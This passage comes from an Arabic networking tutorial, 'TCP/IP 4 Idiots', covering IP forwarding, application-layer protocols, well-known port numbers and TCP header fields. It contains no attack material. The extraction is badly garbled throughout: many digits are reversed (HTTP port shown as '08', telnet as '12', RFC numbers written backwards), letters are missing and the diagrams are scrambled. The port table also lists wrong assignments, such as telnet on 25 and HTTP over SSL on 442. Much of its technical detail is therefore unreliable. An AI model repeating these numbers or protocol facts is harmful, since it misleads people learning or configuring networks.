‫|‪ | |ARP| |           | |ARP| ‬‬ ‫|‪     | ­­­­­ |       | ­­­­­ ‬‬ ‫|‪     |      \ |      | /      ‬‬ ‫|‪     |      ­­­­­­ ­­­­­­     ‬‬ ‫|‪|        |ENET| |ENET|            ‬‬ ‫|‪  |       ­­­@­­ ­­­@­­         ‬‬ ‫­­­­­­­­­|­­­­­­­|­­­­­­­­­­‪   ‬‬ ‫|‪               |       ‬‬ ‫‪                  57‬‬ ‫‪                       |    ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­o‬‬


‫‪                         |           2 Ethernet Cable‬‬ ‫‪                            ­­­­­­­­­­­­­­­­­­­­­­­­­o‬‬ ‫‪                               1 Ethernet Cable‬‬ ‫ت‪                ‬‬ ‫الصورةالثالثة ‪ :‬عقدة شبكة مع ‪ 2‬بطاقة ايثرنت‬ ‫لحظ أن ھذا الجھاز لديه واجھ تین شبكة ‪ ..‬أي بطاقتین ايثرنت ‪ ...‬وبـذلك تـصبح‬ ‫ح‬ ‫‪                          Ethernet‬‬ ‫‪E‬‬ ‫لديھا زوجا من عنوان ‪ IP‬وزوجا من عنوان‪..‬‬ ‫‪     m ­ to ­ n‬‬ ‫‪m‬‬ ‫وفي ھذه الحالة نموذج ‪ IP‬تعتبر مازج ‪n ­ to ­ m‬وموزع المزج‬ ‫‪1 2 3 ... n                    1 2 3 ... n‬‬ ‫^‪       || \       /  |               || \       /      ‬‬ ‫|‪        ||\      /   |                ||\      /       ‬‬ ‫‪      ­­­­­­­­­­­­­ flow              ­­­­­­­­­­­­­­­­ flow‬‬ ‫‪      ||multiplexer      of             ||de­multiplexer     of‬‬ ‫‪      ­­­­­­­­­­­­­ data               ­­­­­­­­­­­­­­­­ data‬‬ ‫|‪        ||/      \   |                ||/      \       ‬‬ ‫|‪       || /       \  v               || /        \     ‬‬ ‫‪      1 2 3 ... m                     1 2 3 ... m‬‬ ‫الصورة الرابعة ‪ :‬المازجات والموزعات المتعددة ‪                                 ::‬‬ ‫‪                                         85‬‬ ‫‪n­to­m multiplexer and m­to­n de­multiplexer‬‬ ‫‪                      TCP          UDP‬‬ ‫‪                            \      /‬‬ ‫‪                             \    /‬‬ ‫­­­­­­­­­­­­­­‪                       ‬‬ ‫|‪                       |       IP      ‬‬ ‫|‪                        |              ‬‬ ‫|‪                        |     ­­­      ‬‬ ‫|‪                        | / \          ‬‬ ‫|‪                       | /        v ‬‬ ‫­­­­­­­­­­­­­­‪                       ‬‬ ‫\‪                          /          ‬‬ ‫\‪                         /            ‬‬ ‫‪                    data              data‬‬ ‫‪                               59‬‬ ‫‪                          comes in         goes out‬‬ ‫‪                            here             here‬‬ ‫‪                        IP‬‬ ‫الصورةالخامسة ‪ :‬تمرر رزمة ‪I‬‬ ‫‪                   Example of IP Forwarding a IP Packet‬‬ ‫‪، Forwarding‬‬ ‫‪F‬‬ ‫وعملیـة إرسـال رزم ‪ IP‬إلـى شـبكة خارجیـة تـسمي تمريـر‪،‬‬ ‫‪                IP­Router‬‬ ‫‪I‬‬ ‫والجھاز الخاص لعملیة التمرير ھذه تسمي الموجه‬ ‫‪   UDP‬‬ ‫‪U‬‬ ‫كما تري من الصورة أعله أن توجیه رزم ل علقة لھا ھنا بنماذج ‪ TCP‬أو‬ ‫النموذجین‪                ...‬‬ ‫‪.‬‬ ‫لن بعض تصمیمات الموجھ ات ل تحتوي علي تلك‬ ‫=== ‪ IP‬تصمم شبكة منطقیة وحیدة ‪                                       ...‬‬ ‫ى‪ ‬‬ ‫نموذج ‪ IP‬تعتبر مفتاح نجاح تقنیة النترنت ‪ ..‬فكل نموذج أو المشغل تضیف إلى‬ ‫‪ Message‬ترويساتھ ا كما ذكرنا حتى تـصل إلـي النمـوذج أو الطبقـة الـسفلي ‪...‬‬ ‫وفي المقابل تقوم كل نموذج أو الطبقة في الطرف الخـر تقـوم بعـزل الترويـسة‬ ‫ة‬ ‫م‬ ‫خـام‬ ‫الخاصة بھا حتى تصل إلي الطبقة العلیا كما أرسلت في شكل ‪Message‬‬ ‫‪                                                                       ...‬‬ ‫ترويـسة ‪ IP‬تحمـل عنـوان ‪ IP‬التـي تكـون شـبكة منطقیـة وحیـدة مـن شـبكات‬ ‫ت‬ ‫ي‬ ‫يعنـي‬ ‫فیزيائیة متعددة ‪ .‬وتشبیك ھذه الشبكات الفیزيائیة ھي مصدر‪. Internet‬‬ ‫مجموعة مـن الـشبكات الفیزيائیـة متـصلة ومتـشابكة ببعـضھا وتـسمي إنترنـت‬ ‫ت‬


‫وتشكلھا‪                                                                 .‬‬ ‫‪                                      06‬‬ ‫‪ TCP/IP 4 Idiots‬الجزء الثالث‪                ‬‬ ‫للكاتب‪                                                      SaD.jAcKAl:‬‬ ‫الطبقةالولي لـ ‪ :TCP/IP‬طبقة التطبیقات ‪    Network application Layer‬‬ ‫(ملحظة ‪ -‬من اجل وثائق ‪ RFC‬استخدم الموقع‪                          ‬‬ ‫‪                                             (/http://www.faqs.org/rfcs‬‬ ‫‪  : Archie - 1‬برنامج يمكن المستخدم من البحث في مزودات‪              ‬‬ ‫‪ FTP‬عن ملفات وقد حل محلھا تدريجیا ‪ ، WWW‬للمزيد‪                   ‬‬ ‫‪  id=4&action=info&http://www.angels­bytes.com/?show=articals‬‬ ‫‪ BGP Border Gateway Protocol - 2‬بروتوكول غالبا يستخدم‪             ‬‬ ‫بین ‪ ISP‬من اجل الربط‪ ،‬وبما يعني ان النترنت نفسھا تتم الربط بین كبريات‬ ‫شبكاتھا‪                                                                  ‬‬ ‫بھذا البروتوكول‪                                                          .‬‬ ‫وتندرج تحت ‪ Classless Routing Protocol‬عكس ‪ RIP‬التي تعتبر ‪Classfull‬‬ ‫للمزيد راجع ‪1771 ) RFC‬الصدار الخیر للبروتوكول )‪                       ‬‬ ‫‪ : Domain Name Server DNS - 3‬بروتوكول تحويل النطاق‪               ،‬‬ ‫من اشھر برامجه ‪ Nsloopup‬تقوم بتحويل اسماء نطاق الي عناوين ايبي‪  ‬‬ ‫والعكس ‪ ..‬للمزيد‪                                                        ‬‬ ‫‪                                 16‬‬ ‫راجع الوثیقة ‪                               RFC799,882,883,920,1035 etc‬‬ ‫‪ Finger - 4‬تستخدم من اجل الحصول علي معلومات حول‪                    ‬‬ ‫مستخدم‪/‬مضیف ما في الشبكة‪ ،‬من المفضل دائما تعطیل ھذه الخدمة من‪    ‬‬ ‫اجل دواعي المنیة‪                                                         ‬‬ ‫‪                                                               . 8821 RFC‬‬ ‫‪ - 5‬تطبیق ‪ ،FTP‬اختصار ‪ File Transfer Protocol‬بروتوكول‪                     ‬‬ ‫نقل الملفات‪ ،‬وتطبیق ‪ FTP‬مثل تلنت تعمل عبر ‪TCP‬و وفقا لبروتوكول ‪     ،FTP‬‬ ‫والعملیة تشبه‪                                                             ‬‬ ‫عملیة الوجول للمزود عبر تلنت ولكنك ھنا تقوم بالتصفح عبر الفھارس والملفات‬ ‫وتمكنك‪                                                                     ‬‬ ‫من نقل الملفات بین الجھزة ‪ .‬راجع الوثیقة رقم ‪                     959RFC‬‬ ‫‪ HTTP Hypertext Transfer Protocol - 6‬بروتوكول نقل‪                       ‬‬ ‫النص المتشعب ھو البروتوكول المعتمد لنقل النصوص بھیئة ‪ HTML‬في شبكة‪ ‬‬ ‫ويب‪ .‬يحتوي‪                                                               ‬‬ ‫بروتوكول ‪ HTTP‬على أوامر عالیة المستوى‪ ،‬مثل ‪ Get‬و ‪ ،Put‬تستخدمھا‪       ‬‬ ‫المتصفات ‪                                                        browsers‬‬ ‫في التواصل مع مزودات ويب‪ .‬ويستخدم المر ‪ Get‬لطلب صفحة ذات ھیئة‪      ‬‬ ‫‪ ، HTML‬أو صورة‪                                                            ‬‬ ‫بھیئة ‪  ،GIF.‬أو أية بیانات أخرى من مزود ويب‪ ،‬لعرضھا على الشاشة‪ .‬راجع‪     ‬‬ ‫الوثیقة رقم‪                                                                ‬‬ ‫‪                                                                  5491RFC‬‬ ‫‪                      7 ­ IMAP The internet Mail/Messeg Access Protocol‬‬ ‫تستخدم ھ ذه البروتوكول من قبل برامج البريد اللكتروني كبديل ل ‪        POP‬‬ ‫وكواجھة بین‪                                                               ‬‬ ‫المستخدم ومزود البريد وتعمل علي جلب وادارة صندوق البريد بشكل مرن ‪....‬‬ ‫راجع‪                                                                       ‬‬ ‫‪                                     26‬‬ ‫الوثیقة ‪                                                      1371,0371RFC‬‬ ‫‪ Ping The Packet Internet Groper - 8‬أحد تطبیقات‪                         ‬‬ ‫ا‪     ‬‬


‫‪ ،TCP/IP‬يستخدم لكشف ما إذا كان كمبیوتر معین متص ً بالشبكة وجاھًز‪     ‬‬ ‫ل‪                      ‬‬ ‫للتصال به‪                                                                .‬‬ ‫ويتم كشف حالة كمبیوتر ما‪ ،‬بإرسال إشارة إرجاع الصدى ‪ICMP echo request‬‬ ‫وانتظار‪                                                                      ‬‬ ‫الرد‪ .‬راجع ‪                                                         297RFC‬‬ ‫‪POP - 9‬بروتوكول مكتب البريد ‪                          Post Office Protocol‬‬ ‫بروتوكول لنقل النصوص‪ ،‬يستخدم لرسال واستخراج رسائل البريد اللكتروني‪  ‬‬ ‫ضمن شبكة‪                                                               ‬‬ ‫ف لبروتوكول ‪ ،SMTP‬الذي يستخدم لنقل رسائل البريد بین النظم‪ ‬‬ ‫إنترنت‪ .‬وخل ً‬ ‫ا‪                                                             ‬‬ ‫المزودة‪                                                                    ،‬‬ ‫يوفر بروتوكول ‪ POP‬وسیلة لتفاعل برامج البريد مع صناديق البريد الفتراضیة‪   ،‬‬ ‫التي‪                                                                        ‬‬ ‫تحتفظ بالرسائل إلى حین استخراجھا أو إرسالھا إلى وجھاتھا‪ .‬يتوفر بروتوكول‪ ‬‬ ‫‪ POP‬تحت‪                                                                  ‬‬ ‫اسمین ‪2 POP‬و ‪3 .POP‬والتشابھة بین ھذين البروتوكول ھو في السم فقط‪  ،‬‬ ‫وھما غیر‪                                                                   ‬‬ ‫متوافقین على الطلق ‪ ..‬راجع الوثیقة رقم ‪                         0641RFC‬‬ ‫‪ - 01‬تطبیق ‪ Telnet‬اختصار ‪                   :Telecommunication Network‬‬ ‫تقدم تلنت خدمة الولوج عن بعد عبر ‪ TCP‬والبروتوكول المسمي ‪        telnet‬‬ ‫‪ protocol‬وتعتبر‪                                                            ‬‬ ‫من اقدم التطبیقات الشبكة‪ ،‬وعندما يقوم احد بالولوج عبر تلنت الي مزود‪/‬خادم‬ ‫بعید‪                                                                        ‬‬ ‫كلما يكتبه من اوامر تنفذ في ذاك المزود ولیس في جھازه ‪...‬وتطبیقات تلنت‪   ‬‬ ‫متوفرة في‪                                                                 ‬‬ ‫كل نظم التشغیل ول اعتبار لنظام التشغیل التي يعمل علیھا المزود‪ ...‬راجع‪   ‬‬ ‫الوثیقة‪                                                                     ‬‬ ‫‪                                     36‬‬ ‫راجع الوثیقة ‪                                                        458RFC‬‬ ‫‪ SSH Secure Shell Protocol - 11‬يستخدم من قبل برامج‪                   ‬‬ ‫للتصال بمضیف بعید عبر انترنت مثل تلنت ولكن يستخدم التشفیر في عملیة‬ ‫تبادل كلمة‪                                                                  ‬‬ ‫السر والبیانات ‪                                                             .‬‬ ‫من اشھر برامجھا ‪ ..SecureCRT, Putty‬للمزيد راجع‪                          ‬‬ ‫‪                                   http://www.cise.ufl.edu/help/ssh/RFC‬‬ ‫‪ SMTP - 21‬البروتوكول البسیط لنقل البريد ‪                     Simple Mail‬‬ ‫‪ Transfer Protocol‬بروتوكول من مجموعة ‪ ،TCP/IP‬يستخدم لنقل النصوص‪   ‬‬ ‫أثناء تبادل‪                                                                   ‬‬ ‫الرسائل عبر إنترنت‪ .‬وھ و نسخة مبسطة عن بروتوكول ‪ .MTP‬يحدد بروتوكول‪  ‬‬ ‫‪ SMTP‬ھیئة‪                                                                ‬‬ ‫وطريقة تبادل البیانات بین مزودات البريد‪.‬راجع الوثیقة رقم ‪       228,128RFC‬‬ ‫‪ SNMP Simple Network Management Protocol - 31‬برتوكول‪              ‬‬ ‫ادارة الشبكة تعمل عبر ‪ UDP‬وصممت من اجل ادارة وفحص احوال الشبكات‪  ‬‬ ‫وبھا يستطیع مدير‪                                                          ‬‬ ‫الشبكة اكتشاف مشاكل الشبكة قدم الصدار الول والثاني ‪..‬راجع الوثیق‪    ‬‬ ‫‪                                                            1441,7511RFC‬‬ ‫الصدار الثاني اضافت طرقا اكثر امانا لدارة الشبكات ‪ ...‬بروتوكول معقد نوعا ما‬ ‫‪                                                                             ،‬‬ ‫ونشرت كتب خصیصا لھا ‪ ...‬راجع الوثیقة ‪7511 RFC‬و ‪0752 RFC‬تتحدث عن‪    ‬‬


‫الصدار الثالث‪                                                               ‬‬ ‫‪                                                                           ...‬‬ ‫‪                                    46‬‬ ‫‪                          http://www.wtcs.org/snmp4tpc/snmp_rfc.htm‬‬ ‫‪  SSL Secure Sockets Layer - 41‬طبقة مقبس آمن صممت من قبل نتسكیب‬ ‫تقدم آلیة عمل من‪                                                        ‬‬ ‫اجل اتصال آمن عبر النترنت‪ ،‬اعتمدت علي التوثیق و طريقة تشفیر مفتاح‪    ‬‬ ‫العام ‪                                                               Public‬‬ ‫‪ Key‬من اشھ ر برامج تستخدم ھذا البروتوكول ھو ‪ HTTP‬عبر ‪ ) SSL‬اغلب‪     ‬‬ ‫المتصفحات يدعم‪                                                          ‬‬ ‫ھذا البروتوكول ھذه اليام )ولكنه لیس خاصا ب‪ HTTP‬فقط‪ ،‬بروتوكولت اخري‪ ‬‬ ‫مثل‪                                                                       ‬‬ ‫‪3 IMAP4,FTP,Telnet,POP‬ايضا تدعمه ‪ .‬الصدار الجديد من ھذا البروتوكول تم‬ ‫تسمیته‪                                                                  ‬‬ ‫‪ Transport Layer Security TLS‬راجع الوثیقة رقم ‪                6422. RFC‬‬ ‫‪ ،TFTP The Trivial File Transfer Protocol - 51‬برتوكول‪                     ‬‬ ‫مبسط من ‪ FTP‬من اجل نقل الملفات‪ ،‬وأقل أمنا ‪ ...‬راجع الوثیقة ‪ 0531. RFC‬‬ ‫‪ TraceRoute - 61‬من أشھ ر تطبیقات وبرامج مھمة في عالم‪                 ‬‬ ‫الشبكة‪ ،‬صممت أصل من اجل اكتشاف حالة مزودما او طريقة ما بین جھازين‬ ‫‪ ...‬يظھر‪                                                                   ‬‬ ‫الطريق التي سلكه رزمة ما ارسلت من جھاز الي جھاز آخر‪ .‬متوفر في أغلب‪ ‬‬ ‫نظم التشغیل‪                                                             ‬‬ ‫‪ ...‬تقنیا تعتمد علي حقل ‪                    3931Time­To­Live TTL .RFC‬‬ ‫‪ Whois - 71‬برنامج مفید مثل تبحث في قواعد بیانات ‪                   DNS‬‬ ‫وغیرھ ا من اجل معلومات عن عناوين النطاق ( اسماء‪ ،‬عناوين وارقام تلیفونات‬ ‫للتصال‪                                                                   ‬‬ ‫وما الي ذلك )‪                                                            .‬‬ ‫‪                                                           www.arin.com‬‬ ‫‪                                   56‬‬ ‫‪ ، www.ripe.net/whois‬للمزيد راجع الوثیقة‪                            ‬‬ ‫رقم ‪                                                         RFC 459‬‬ ‫‪ NFS - 81‬اختصار ‪ Network File System‬نظام ملف الشبكة‪              ‬‬ ‫طورت من قبل شركة ‪ Sun‬وتعمل عبر ‪ ، UDP‬تمكنك من الوصول الي القراص‬ ‫في شبكات بعیدة‪                                                    ‬‬ ‫وكانھا جزء من الجھازالمحلي الخ آخر اصداره ‪ ،4‬راجع الوثیقة ‪    0103RFC‬‬ ‫ھذا لیس حصرا لبرامج ھذه الطبقة وانما جزء منھا‪                      ‬‬ ‫‪                                66‬‬ ‫‪TCP/IP4 Idiots‬الجزء الرابع‪                        ‬‬ ‫للكاتب‪                                                          SaD.jAcKAl:‬‬ ‫المنفذ ‪                                                                    :‬‬ ‫عندما وتنشئ اتصال او ربطا مع جھ از آخر‪/‬بعیدعلیك ان تحدد رقم المنفذ التى‪ ‬‬ ‫ترسل وتستقبل البیانات من خللھا ‪ .‬وھذه المنفذ لیست محسوسة كمنافذ‪  ‬‬ ‫‪2 COM1 , COM‬ولكنھ ا مجرد منفذ افتراضي وفائدة المنفذ حتى ل تضل البیانات‬ ‫طريقھا‪ ،‬مثل بدون المنفذ ماذا لو ذھب البیانات التى ترسلھا الى مزود ويب‪    ‬‬ ‫الى مزود آخر مثل ‪ Telnet‬او‪ FTP‬؟‪                                            ‬‬ ‫حتى ل يحدث ھ ذا تستخدم المنافذ حیث كل خدمة او بروتوكول لھا منفذ خاص‬ ‫مثل ‪ Telnet‬تستخدم منفذ ‪ 12‬لستقبال البیانات و ‪ HTTP‬تستخدم منفذ رقم‪   ‬‬ ‫‪ 08‬لتعامل مع العمیل الخ الخ ‪                                               ...‬‬ ‫المنافذ عبارة عن ارقام من ‪ 61‬بت حوالي اي ‪ 53556‬منفذ متوفرة ‪            ...‬‬ ‫المنافذ من ‪ 0‬حتي ‪ 3201‬تدعي المنافذ المعرفة مسبقا‪ ،‬مرتبطة‪                 ‬‬


‫لتطبیقات‪/‬مزودات تقدم ببروتوكولت‪/‬خدمات معروفة مثل ‪ HTPP,FTP‬وفي نظم‪ ‬‬ ‫تشغیل متعدد البیئة مقیدة استخدامھ ا برخصة من مدير النظام ( ‪          root,‬‬ ‫‪                                                            . (Administrator‬‬ ‫الرقام من ‪ 4301‬حتي ‪ 53556‬تدعي المنافذ المسجلة‪ ،‬وتقع في في ھذا‪     ‬‬ ‫القسم ارقام تعارف علیھ ا مجتمع النترنت لستخدامھا بحرية في تطبیقاتھم ‪ ،‬‬ ‫كل من تطبیقات مزود او الزبون بامكانھا اختیار رقم من ھذا القسم ( بالنسبة‪  ‬‬ ‫للمزود يستخدم منفذه الخاص المحددة‪ ،‬اما تطبیق زبون من الممكن اختیار أي‬ ‫رقم عشوائي من ھ ذا القسم أو تحصل علیه من قبل نظام التشغیل ) ‪        .‬‬ ‫‪                                      76‬‬ ‫بعض ارقام المنافذ الشھیرة‪                           ‬‬ ‫المنفذ البروتوكول الساسي‬ ‫الخدمة‪/‬البروتوكول‬ ‫‪               echo                     TCP          7‬‬ ‫‪          daytime                       TCP        13‬‬ ‫‪       ftp­control                      TCP        20‬‬ ‫‪          ftp­data                      TCP        21‬‬ ‫‪             telnet                     TCP        25‬‬ ‫‪               time                     UDP        27‬‬ ‫‪            Whois                       TCP        43‬‬ ‫‪                dns                TCP/UDP         53‬‬ ‫‪                tftp                    UDP        69‬‬ ‫‪           ghoper                       TCP        70‬‬ ‫‪             finger                     TCP        79‬‬ ‫‪             HTTP                       TCP        80‬‬ ‫‪              pop3                      TCP      110‬‬ ‫‪       netbios­ns                       UDP      137‬‬ ‫‪    netbios­dgm                         TCP      138‬‬ ‫‪      netbios­ssn                       TCP      139‬‬ ‫‪              imap                      TCP      143‬‬ ‫‪                bgp                     TCP      179‬‬ ‫‪           http/ssl                     TCP      442‬‬ ‫‪                 rip                    UDP      520‬‬ ‫‪             socks                      TCP 1080‬‬ ‫‪       traceroute                       UDP 33434‬‬ ‫والقائمة الكاملة للمنافذة توجد ھنا‪                     ‬‬ ‫‪http://www.iana.org/assignments/port­numbers‬‬ ‫‪              68‬‬ ‫وارقام المنافذ والخدمات المدعمة من قبل النظام توجد في ملف اسمه‪        ‬‬ ‫‪ services‬في بیئة لینكس في مجلد ‪ ، /etc‬وفي بیئة ويندوز ‪   ، c:\windows‬‬ ‫وفي بیئات ‪ W2k‬توجد في ‪                 C:\winnt\system32\drivers\etc‬‬ ‫•‪   ‬بروتوكول التحكم بالنقل ‪           TCP Transmission Control Protocol‬‬ ‫كما ھو مذكور في ‪ RFC793 TCP‬تقدم قناة اتصال تعتمد علي إنشاء اتصال اول‬ ‫وبذلك تضمن وصول الرزم الي وجھتھا وفي ترتیبھا الصحیح في حالة تجزئتھا‪  ‬‬ ‫وتقوم كشف الخطاء وتصیحھا وتجمیعھ ا مرة اخري اذا كانت قد قسمت الي‪  ‬‬ ‫رزمة صغیرة ‪                                                            ..‬‬ ‫يستخدم ‪ TCP‬من قبل تطبیقات الشبكات التي تتطلب اتصال آمن‪/‬موثوق‪      ‬‬ ‫وويضمن عدم ضیاع الرزم‪ ،‬وابرز المثلة لذلك تطبیقات ‪FTP‬و ‪          TELNET‬‬ ‫وغیرھم‪..‬إل ان ‪ TCP‬مقابل تلك الموثوقیة يتطلب مزيدا من قوية ‪CPU‬و عرض‪  ‬‬ ‫الحزمة للشبكة ونموذج ‪ TCP‬وترويستھا أكثر تعقیدا من ‪               . UDP‬‬ ‫عندما يبدأ تطبیق ما استخدام‪ ،TCP‬نموذج ‪ TCP‬في المكدس في جھاز الزبون‬ ‫والخادم يبدءان في التخاطب ويتم انشاء وصلةافتراضیة ‪Virtual Circui‬بینھم‪   ‬‬


‫تحمل معلومات عن كل منھم وھ ذه الوصلت الفتراضیة تعتبر الرسال فیھا ذو‪ ‬‬ ‫اتجاه ثنائي‪ full deplex‬بمعني ان الرسال يتم في كل التجاھین وفي نفس‪  ‬‬ ‫الوقت مثل التلیفون ‪                                                   ...‬‬ ‫‪  0                            1                          2‬‬ ‫‪                                                                        3‬‬ ‫‪6 54 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0‬‬ ‫‪                                                              10 98 7‬‬ ‫‪                                   96‬‬ ‫‪                   Source Port                          |      Destination Port‬‬ ‫‪                                                            Sequence Number‬‬ ‫‪                                                    Acknowledgment Number‬‬ ‫‪                                Data      |                     | |U|A|P|R|S|F‬‬ ‫‪           Offset        | Reserved          | |R|C|S|S|Y| I‬‬ ‫‪                                                                      Window‬‬ ‫‪                                          |                     ||G|K|H|T|N|N‬‬ ‫‪                             Checksum                 |                  Urgent‬‬ ‫‪                                                                        Pointer‬‬ ‫‪              Options                                              |  Padding‬‬ ‫‪.................... Data‬‬ ‫وفي ھذه الطبقة وحدة البیانات تسمي ‪ segment‬لن ‪ TCP‬ھنا ل تعرف‪        ‬‬ ‫‪ ) Message‬تذكر الرزمة في طبقة التطبیقات تدعي ‪ ( Message‬بل تقوم بارسل‬ ‫البیانات علي شكل مجموعة بايتات وتكوين ھذا القطعة‪ ،‬وعلي ‪ TCP‬أن يعرف‪  ‬‬ ‫إلي اي عملیة اتصال تنتمي ھذه القطعة‪ ،‬ويسبقھ ا عملیة اضافة ترويسة‪     ‬‬ ‫خاصة ب ‪ ،TC‬وھ ذه الترويسة مجموعة من حقول المعلومات ( بايتات ) تضاف‪  ‬‬ ‫إلي بداية كل قطع ‪ ....‬وھي تظھر في الرسم أعله ‪ ..‬وتسمي ترويسة رزمة‪  ‬‬ ‫‪ .. TCP‬وھي تتكون من ‪ 02‬بايت تشكل حقول المعلومات‪ ،‬واھم ھذه الحقول‪  ‬‬ ‫الحقول التي تحمل عنوان الجھة الخري‪ ،‬ورقم النفذ‪ ،‬وعنوان المرسل والمنفذ‪ ‬‬ ‫ورقم التسلسل للرزمة ‪                                                       ...‬‬ ‫‪ TCP‬بعد تقسیم البیانات يمررھا إلي طبقة اليبي مع وجھتھا‪ ..‬واليبي لیست‪ ‬‬ ‫لديھا فكرة عما اذا كانت ھذه القطعة متصلة بما قبلھ ا من القطع او بما بعدھا‪  ‬‬ ‫‪                                                                              ...‬‬ ‫ونستعرض حقول ھذه الترويسة فیما يلي ‪                                    :‬‬ ‫= حقل ‪ Source Port, Destination Port‬تحتوي علي المنفذين في‪             ‬‬ ‫المستخدمة في جھة تطبیقات المزود والزبون ‪                                  ...‬‬ ‫‪                                        07‬‬ ‫= حقل ‪ Sequence Number‬الرقم التسلسلي تشیر الي ترتیب اول بايت في‬ ‫المقطع الحالي‪ ،‬تشیر الي ترتیبھا في مجموع تیار البیانات ‪ ... Stream‬والرقم‪ ‬‬ ‫التسلسي ل يكون حسبب عدد الرزم ولكن حسبب البیانات‪ ،‬مثل‪ ،‬اذا كان‪     ‬‬ ‫الرزمة الولي حجمھا ‪ 005‬بیات‪ ،‬ستكون الرقم التسلسي ‪ ، 0‬والرقم‪            ‬‬ ‫التسلسلي للرزمة الثانیة ‪ 005‬ھكذا دوالیك ‪ ..‬وھي تفید في اعادة تجمیع‪     ‬‬ ‫الرزم وتشكیلھا من جديد الي الصل ‪                                         ..‬‬ ‫= حقل المصادقة ‪ Acknowledgment number‬تستخدم من قبل المرسل‪      ‬‬ ‫للتأكد من استلم البیانات ‪ ،‬فمن اجل التأكد ان ال القطعة وصلت الي ھدفھا‪  ‬‬ ‫يجب علي المستقبل ارسال رسالة ‪ ،acknowledgement‬وھي تحمل في‪     ‬‬ ‫نفس الوقت رقم تسلسلي التي يتوقعھا المستقبل في تیار البیانات ( في‪     ‬‬ ‫حالة تسلم ‪ 005‬بايت المستخدم يرسل رقم ‪ ) 005‬اما في حالة المرسل لم‪  ‬‬ ‫يستلم رسالة تاكید ‪ Acknowledgement‬من المستقبل في وقت محدد يقوم‪ ‬‬ ‫بارسال المعلومات مرة اخري ) ‪                                            > <.‬‬ ‫= حقل ‪ data offset‬تشیر اول بايت تنتمي الي المعلومات ‪                    ...‬‬ ‫= حقل ‪ Control flag‬تحمل مجموعة من الرايات التي تتحكم في عملیة اتصال‬


‫‪ TCP‬وھي تشمل ‪                                                           :‬‬ ‫== ‪ ، urgent pointer field Significant URG‬عندما يتم تحديد ھذه الراية‪    ‬‬ ‫تشیر الي ان المقطع الحالي يحمل بیانات مھمة تتطلب الولوية في المعالجة‪ ‬‬ ‫‪                                                                             ..‬‬ ‫== ‪ ، Acknowledgement Field Significant ACK‬عندما يتم تحديد ھذه‪     ‬‬ ‫الراية تشیر إلي ان القیمة التي في حقل ‪ Acknowledgment Number‬رقم‪   ‬‬ ‫صحیح‪ ،‬يتم تحديد ھذه الراية في كل المقاطع ( الرزم) باستثناء اول رزمة في‪ ‬‬ ‫عملیة انشاء التصال ‪                                                        .‬‬ ‫== ‪ Push function PSH‬تستخدم لجبار ‪ TCP‬في ارسال البیانات بل انتظار‪ ‬‬ ‫لنتھاء المستقبل من معالجتھا ( تحرير الذاكرة الوسیطة ‪ buffer‬من البیانات‪   ‬‬ ‫السابقة ولستقبال الجديد ) ‪ ..‬مفیدة عند ارسال كمیة بیانات قلیلة‪           ..‬‬ ‫== ‪ Reset Connection RST‬عندما يتم تحديد ھذه الراية تتم إنھاء التصال‪   ‬‬ ‫فورا ‪                                                                       ..‬‬ ‫‪                                      17‬‬ ‫== ‪ Synchronize Sequence Number SYN‬تحدد رقم تسلسل تھیئة في‪   ‬‬ ‫بداية انشاء التصال ‪                                                                ...‬‬ ‫== ‪ Finish FIN‬تشیر الي طلب انھ اء التصال بشكل طبیعي ( نتیجة لنتھاء‪ ‬‬ ‫المھمة من التصال ) ‪                                                               ..‬‬ ‫= حقل ‪ Window‬تستخدم من اجل التحكم في سیر البیانات‪ ،‬تحمل رقما‪     ‬‬ ‫تشیر الي كمیة البیانات التي يستطیع المسستقبل استقالبھا في ذاكرة‪     ‬‬ ‫الوسیطة ‪ buffer‬المخصصة للتصال الحالي وعندما يصل يستقبل معلومات تتم‬ ‫نقص ھذا الرقم بحجمھ ا ‪ ..‬المرسل ل يستطیع ارسال البیانات بشكل متواصل‬ ‫او بشكل اسرع مما يستطیع الطرف الخر معالجته ‪ ،‬ومن اجل حل ھذه‪       ‬‬ ‫المشكلة يقوم الطرف الخر بملء خانة ‪ Window‬بكمیة البیانات التي يستطیع‪ ‬‬ ‫معالجتھ ا في وقت واحد ‪ ...‬كلما يستلم الطرف الخر كمیة من البیانات يقوم‪   ‬‬ ‫بانقاص الرقم في حقل ‪ window‬بشكل مناسب‪ ،‬حتي اذا ما صارت صفرا يجب‬ ‫علي المرسل التوقف لبرھ ة حتي يقوم المستقبل بمعاجلة البیانات ويفرغ ال‪  ‬‬ ‫‪ Buffer‬ثم يقوم بزيادة الرقم في حقل ‪ window‬بما يعني ان المستقبل جاھز‪  ‬‬ ‫لستقبال البیانات مرة اخري ‪                                                    ...‬‬ ‫= حقل ‪ checksum‬التحقق وھذا رقم يتم حسابھ ا وفق خوارزمیة معینة وتنتج‪ ‬‬ ‫رقما فريدا يمكن بھ ا التقق من صحة المعلومات الواردة او حدوث تلف‪/‬تغییر في‬ ‫محتواھ ا ‪ ...‬الطرف التي استلمت الرزمة تقوم باعادة انتاج‪ Checksum‬للبیانات‪ ‬‬ ‫وتقارنھا مع ‪ Checksum‬الواردة في الترويسة‪ ،‬واذا كانت نفس الرقام تكون‪    ‬‬ ‫الرزمة سالمة وال تعبر تالفة وتترك‪ ،،‬ويتم طلب اعادة ارسال الرزمة مرة اخري‪ ‬‬ ‫‪                                                                          ...> /< FONT‬‬ ‫= حقل ‪ Urgent Pointer‬تشیر الي بداية بیانات التي اشیر الیھا كبیانات يجب‪ ‬‬ ‫اعطائھا الولوية في المعالجة ‪ ،‬وھذه البیانات توضع داخل القطعة ما بین‪      ‬‬ ‫الترويسة والبیانات العادية وھ ذا الحقل صحیح في حالة استخدام راية ‪... URG‬‬ ‫فلنقل انك بدات في ارسال ملف ما إلي جھة ما‪                            ،،‬‬ ‫‪.........................‬الملف‪                            ................................‬‬ ‫ثم تم تقطیعھا الي القطع من قبل ‪                                         ،TCP‬‬ ‫‪                             .... .... .... .... .... .... .... .... .... .... .... .... ....‬‬ ‫‪                                        27‬‬ ‫اذا افترضنا ان ‪ T‬تمثل ترويسة ‪ TCP‬والبیانات ‪ .....‬فسوف يكون الشكل الكامل‪  ‬‬ ‫للملف ھكذا‪                                                                  ‬‬ ‫‪                  ....T ....T ....T ....T ....T ....T ....T‬‬ ‫( لماذا التقطیع الي رزم صغییرة؟؟ لن النترنت تتكون من شبكات مختلفات‪    ‬‬ ‫التصمیم فبعض الشبكات قدرتھ ا علي المعالجة اقل من الشبكات الخري في‪  ‬‬ ‫الحجم 